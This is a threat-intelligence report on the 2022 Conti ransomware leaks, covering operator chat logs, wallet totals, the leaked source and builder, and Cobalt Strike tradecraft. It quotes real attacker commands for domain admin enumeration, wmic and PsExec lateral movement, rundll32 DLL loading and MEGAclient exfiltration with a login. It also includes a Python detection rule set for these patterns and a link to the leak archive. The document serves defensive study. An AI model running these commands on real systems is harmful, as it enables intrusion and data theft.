Following the Conti group's announcement of support for the Russian government, an anonymous person known on Twitter only as ContiLeaks declared support for Ukraine in the ongoing war. On February 27, 2022 he began leaking internal information from the ransomware group: just over a year's worth of conversations between its operators, victims and other relevant individuals, technical details about the attacks carried out and the infrastructure used, the amounts received, and even the addresses of cryptocurrency wallets, some of which still hold money from ransom payments.
Chat history
One of the richest materials for threat intelligence purposes is the logs of conversations between Conti members. The content is extensive and still being analyzed, but it has already produced important revelations, such as a possible association between the group and the FSB (the Russian intelligence agency that succeeded the KGB).
In April 2021, two members discussed an intrusion targeting a journalist from the Bellingcat group, specifically seeking files on Alexei Navalny, a political opponent of Vladimir Putin who was poisoned in August 2020.
"Bro is such a question - we work on politics?)"
"in what respect?"
"<Johnyboy77> If the info is some kind of important supposedly
[21:04:21] <Johnyboy77> or just score?
[21:10:55] <Mango> Hi Bro
[21:11:06] <Mango> Come on)
[21:11:12] <Johnyboy77> Property
[21:11:13] <Mango> In general, we work for loot :)
[21:11:20] <Mango> And fuck from whom to demand it
[21:11:22] <Johnyboy77> I merged the correspondence of people who are working against the Russian Federation
[21:11:25] <Johnyboy77> in the information field
[21:11:31] <Johnyboy77> But I can not decipher
[21:11:34] <Johnyboy77> Correspondence of the signal
[21:11:52] <Johnyboy77> shorter journalists
[21:11:54] <Mango> I will ask)
[21:11:55] <Johnyboy77> which are pussy against the Russian Federation
[21:12:04] <Johnyboy77> current file brooms fucking can not decipher
[21:12:13] <Johnyboy77> piece of concrete happened "
"We need this?"
"I don't know how to decorate a signal"
"Or we are current for loot and without political fuss"
"This is E2E"
"Soron I can not do anything here ("
"I even want to help \ Note to help"
"So, in general, we are interested in such data?"
"Ie we are patriots or how?)))"
"We are of course patriots)"
"I understood. If they decipher there - the Mayakna"
"And I wrote there other day to you about Aucion, but I understand you while busy and did not delve)"
[21:21:02] <Johnyboy77> in short So say
[21:21:08] <Johnyboy77> And all of his passwords are
[21:21:17] <Johnyboy77> And she is still Valid
[21:30:56] <Mango> Well Corresponders at least Zaskrinh them
[21:31:05] <Mango> Need spectects bro what to say
[21:31:07] <Johnyboy77> Pink out files
[21:31:12] <Johnyboy77> navalni FSB
Some time later there is a follow-up, with a reference to a "boss":
"Bro about Navalny do not forget, I looked at the chief - he is waiting for details"
The story under discussion is most likely Hunting the Hunters: How We Identified Navalny's FSB Stalkers, in which the Bellingcat team describes how it identified the FSB officers who monitored and followed Navalny around the time of his poisoning.
The conversations also revealed the addresses of bitcoin wallets used by the group. An analysis by vx-underground showed that between April 21, 2017 and February 28, 2022, Conti's main wallet received around 2.7 billion dollars.
It seems that the ransomware group has not yet been able to identify who is leaking their data on Twitter. Chat logs from March 1, 2022 show the internal confusion:
{"ts": "2022-03-01T14:09:27.345914", "from": "qwerty@q3mcco35auwcstmt.onion", "to": "cybergangster@q3mcco35auwcstmt.onion", "body": "Listen, Azim and Smelian wrote me today, they're worried they're falling over 17:09 that they've been messing with us 17:09 what should I tell them?"}
{"ts": "2022-03-01T16:12:42.619523", "from": "wind@q3mcco35auwcstmt.onion", "to": "mango@q3mcco35auwcstmt.onion", "body": "who leaked, did you find out?{backslash}do you think we'll rebel?"}
It is interesting to note that the recipient of the second message, Mango, is the same person involved in the conversations about Alexei Navalny in April 2021. The leaks also contain several mentions of the Cobalt Strike tool; the commands and legitimate binaries (LOLBins) associated with it are covered in the following section.
Cobalt Strike and LOLbins
Among the leaks released so far, Conti Rocket Chat Leaks.7z (SHA-256 7B49130E26505A6AC3786591F548D492DD6D83CE8986477AD803FD04615209F8) contains a series of abuses of legitimate Windows executables during Conti intrusions. Pay special attention to commands beginning with "shell": Beacon passes these to the infected machine's command interpreter (cmd.exe /c ...), which makes them much easier to detect than operations performed in-memory by the beacon itself.
We will not attach the full content of this leak to this document, since it is full of internal network data from the group's victims. For those interested in extracting every occurrence of Cobalt Strike use from the file in question, we recommend the following command, adapted from @c3rb3ru5d3d53c:
# Walk the extracted Rocket.Chat dump, pull every message body with jq and keep
# the ones that contain a Cobalt Strike "beacon>" prompt. Paths are quoted so
# that file names with spaces do not break the loop.
find . -type f -name "*.json" | grep -P '\d+-\d+-\d+.*\.json' | while read -r i; do
  jq -r '.messages[]?.msg // empty' "$i" | grep 'beacon>'
done
Here are some relevant commands for detecting Conti activity.
| Commands redirected from CS to the command prompt |
| --- |
| reg query HKCU\Environment |
| net localgroup administrators |
| net group "Domain admins" /dom |
| net group "Enterprise admins" /dom |
| start /b MEGAcmdServer.exe |
| MEGAclient.exe update -auto=off |
| MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd |
| MEGAclient.exe whoami |
| MEGAclient.exe put -q -ignore-quota-warn "C:\Users*****\Documents\Outlook Files\ol.7z" |
| MEGAclient.exe put -q -ignore-quota-warn F:\SQLBackup*.bak |
| wmic /node:10...* process call create "rundll32 C:\ProgramData\x64.dll entryPoint" |
| PsExec \* -d -s -h gpupdate /force -accepteula -y -u .local* -p * |
Sensitive target information in the examples above has been redacted. Good detection practices would alert on several of the commands listed: enumeration of local and domain administrator groups with net, remote process creation through wmic /node ... process call create, rundll32 loading a DLL from C:\ProgramData, and the use of -accepteula, which is characteristic of scripted execution of Sysinternals tools. It is also visible that Conti used MEGA (the cloud storage service launched as the successor to Megaupload) to exfiltrate data such as Outlook archives and SQL backups. We don't know whether this behavior is still present in the group's current intrusions.
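As an added example (not code from this report or from the leak), the following Python rule set applies the patterns in the table above to process-creation telemetry. Field names follow Sysmon Event ID 1 conventions (Image, ParentImage, CommandLine); the sample events are constructed for illustration and the hosts, paths and account in them are fictional. It also adds the parent-process check that the remark about "shell" commands implies: Beacon's shell runs cmd.exe /c as a child of the process hosting the beacon, so cmd.exe spawned by rundll32.exe or a similar host is worth an alert even when the command itself looks mundane.

```python
"""Rule-based detection of the Conti/Cobalt Strike command patterns listed
above, run over constructed Sysmon-style process-creation events."""
import re

# (rule name, regex applied to CommandLine). Matching is case-insensitive.
COMMANDLINE_RULES = [
    ("psexec_accepteula", re.compile(r"\bpsexec\b.*-accepteula", re.I)),
    ("psexec_system_remote", re.compile(r"\bpsexec\b.*\s-s\b", re.I)),
    ("wmic_remote_process_create",
     re.compile(r"\bwmic\b.*/node:.*process\s+call\s+create", re.I)),
    ("rundll32_programdata_dll",
     re.compile(r"\brundll32(\.exe)?\s+\S*programdata\S*\.dll", re.I)),
    ("ad_admin_group_enum",
     re.compile(r'\bnet\s+group\s+"?(domain|enterprise) admins"?\s+/dom', re.I)),
    ("local_admin_enum", re.compile(r"\bnet\s+localgroup\s+administrators", re.I)),
    ("mega_exfil", re.compile(r"\bmegaclient(\.exe)?\s+(put|login)\b", re.I)),
    ("mega_server_start", re.compile(r"\bmegacmdserver(\.exe)?", re.I)),
]

# Beacon's "shell" command runs "cmd.exe /c <cmd>" as a child of the process
# hosting the beacon; these are common hosts for a DLL/scriptlet beacon.
SUSPICIOUS_CMD_PARENTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe",
                          "wscript.exe", "dllhost.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of all rules that fire for one process-creation event."""
    hits = []
    cmd = event.get("CommandLine", "")
    for name, pattern in COMMANDLINE_RULES:
        if pattern.search(cmd):
            hits.append(name)
    if (basename(event.get("Image", "")) == "cmd.exe"
            and basename(event.get("ParentImage", "")) in SUSPICIOUS_CMD_PARENTS):
        hits.append("cmd_spawned_by_beacon_host")
    return hits


def detect(events):
    """Map event id -> fired rules, keeping only events that raised an alert."""
    result = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            result[event["id"]] = hits
    return result


# Constructed sample telemetry (hypothetical hosts, paths and account).
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'cmd.exe /c net group "Domain admins" /dom'},
    {"id": 2, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic /node:10.0.0.5 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"'},
    {"id": 3, "Image": r"C:\Tools\PsExec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"PsExec \\* -d -s -h gpupdate /force -accepteula -y -u corp.local\svc -p x"},
    {"id": 4, "Image": r"C:\Users\alice\AppData\Local\MEGAcmd\MEGAclient.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"MEGAclient.exe put -q -ignore-quota-warn F:\SQLBackup\*.bak"},
    # Benign: an administrator running gpupdate from an interactive session.
    {"id": 5, "Image": r"C:\Windows\System32\gpupdate.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"gpupdate /force"},
]

if __name__ == "__main__":
    for event_id, alerts in detect(SAMPLE_EVENTS).items():
        print(event_id, alerts)
```

Events 1 to 4 each fire at least one rule; event 5 stays silent. Tune the parent list and the PsExec rule to the environment before deploying: some administration scripts legitimately pass -accepteula, so that rule is a strong pivot for triage rather than a stand-alone block decision.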
Source code and builder
The hardest blow to the criminal group came on March 1, when the source code of the ransomware was leaked, together with its builder (the executable used to generate the final binaries sent to victims).
This content is protected by a password that the user ContiLeaks provided to a small group of researchers. Shortly afterwards a second version was released, this time without a password, which omitted the ransomware code and its main functions. Because the archive relied on a legacy, weak encryption scheme, this second version could be used to recover the protected content of the complete leak. Within that content, the builder is protected by a second password that has not yet been discovered.
It's likely that new ransomware groups and low-skill malicious actors will take advantage of Conti's source code to generate their own versions of this malware. For this reason, we won't share where to get the full leak or how to extract its contents without the password. Minimally competent researchers will be able to obtain this information easily.
Conclusion
This is still a developing situation. Analyzing so much material, whether in the form of code or chat logs, will take time. It seems that the leaker has not yet been discovered by the group and will continue to publish information from Conti. We will keep everyone updated on our research involving these materials, sharing as much information as possible with the security community.
For those who want to work directly with the leaks, you can download the compressed files at hxxps://share[.]vx-underground[.]org/Conti/. Translations of materials into English are available at the following GitHub addresses:
https://github.com/west-wind/conti-leaks
https://github.com/TheParmak/conti-leaks-englished
Finally, the bibliographical references in this report contain additional information. We recommend that you read them.
Bibliographical references
https://twitter.com/ContiLeaks/
https://github.com/west-wind/conti-leaks
https://github.com/TheParmak/conti-leaks-englished
https://blog.malwarebytes.com/threat-intelligence/2022/03/the-conti-ransomware-leaks/
https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/
https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/
https://arstechnica.com/information-technology/2022/03/conti-cybergang-gloated-when-leaking-victims-data-now-the-tables-are-turned/
https://www.theregister.com/2022/02/28/conti_ransomware_gang_chats_leaked